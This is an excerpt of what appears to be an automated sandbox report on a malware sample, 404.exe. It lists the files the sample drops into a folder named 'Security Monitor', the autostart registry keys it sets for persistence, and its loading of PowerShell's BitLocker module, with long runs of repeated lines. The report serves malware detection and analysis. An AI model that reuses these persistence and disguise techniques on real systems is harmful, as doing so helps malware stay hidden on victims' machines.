Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-PQPA7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-B6QNS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-KK513.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-DN3K6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe	File created: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1006O.tmp	Jump to dropped file
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File created: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-BG5BA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe	File created: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-CJK34.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-83S41.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\webbrowser.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-RPIHK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_setup64.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-F1LPA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-A63B5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-S45KB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-PQPA7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-B6QNS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-KK513.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-DN3K6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1006O.tmp	Jump to dropped file
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File created: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-BG5BA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-CJK34.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-83S41.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-RPIHK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run kbdsprt	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run kbdsprt	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run localSPM	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run localSPM	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
